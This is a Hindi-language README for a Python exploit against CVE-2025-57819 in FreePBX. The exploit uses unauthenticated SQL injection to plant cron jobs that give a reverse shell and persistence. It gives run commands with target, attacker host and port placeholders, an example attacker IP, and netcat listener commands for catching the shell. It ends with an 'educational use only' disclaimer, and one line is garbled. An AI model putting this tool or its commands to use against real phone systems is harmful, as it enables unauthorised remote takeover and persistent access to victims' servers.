
Python शोषण CVE-2025-57819 के लिए FreePBX को लक्षित करने वाला अप्रमाणित SQL इंजेक्शन के माध्यम से दूरस्थ कोड निष्पादन प्राप्त करने के लिए स्वचालित रिवर्स शेल और cron-आधारित स्थायित्व के साथ।
< 15.0.66, < 16.0.89 और < 17.0.3यह स्क्रिप्ट एक कमजोर FreePBX एंडपॉइंट मॉड्यूल में CVE-2025-57819 का शोषण करती है। यह कमजोरी SQL इंजेक्शन की अनुमति देती है, जिसका उपयोग दुर्भावनापूर्ण क्रॉन जॉब्स इंजेक्ट करने के लिए किया जाता है।
अन्य सार्वजनिक शोषणों की तरह अपलोड किए गए वेबशेल के माध्यम से लक्ष्य के साथ इंटरैक्ट करने के लिए कोई अतिरिक्त कदम आवश्यक नहीं हैं। यह एक सीधा दृष्टिकोण है, जो आपको सीधे रिवर्स शेल एक्सेस देगा।
SQL इंजेक्शन और क्रॉन जॉब हेरफेर के माध्यम से रिमोट कोड निष्पादन प्राप्त किया जाता है। सफल शोषण के परिणामस्वरूप लक्ष्य प्रणाली पर एक रिवर्स शेल प्राप्त होता है। कॉन्फ़िगरेशन के आधार पर, यह पूर्ण सिस्टम समझौता कर सकता है।
* * * * *)base64 पेलोड तब दूषित हो जाते हैं जब + वर्णों को रिक्त स्थान के रूप में व्याख्यायित किया जाता है।लक्ष्य और लिसनर कॉन्फ़िगरेशन प्रदान करके शोषण चलाएँ:
python3 cve-2025-57819.py <target> <lhost> <lport>
<target>: लक्ष्य होस्टनाम या IP पता (कमजोर FreePBX इंस्टेंस)<lhost>: रिवर्स शेल कॉलबैक के लिए हमलावर का IP पता<lport>: आने वाले कनेक्शन के लिए सुनने वाला पोर्टpython3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
शोषण निष्पादित करने से पहले एक लिसनर प्रारंभ करें:
nc -lvnp <port>
nc -nlvp 9999
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। स्पष्ट अनुमति के बिना सिस्टम के खिलाफ अनधिकृत उपयोग अवैध है। लेखक इस उपकरण के दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।
Its1Zero - [email protected]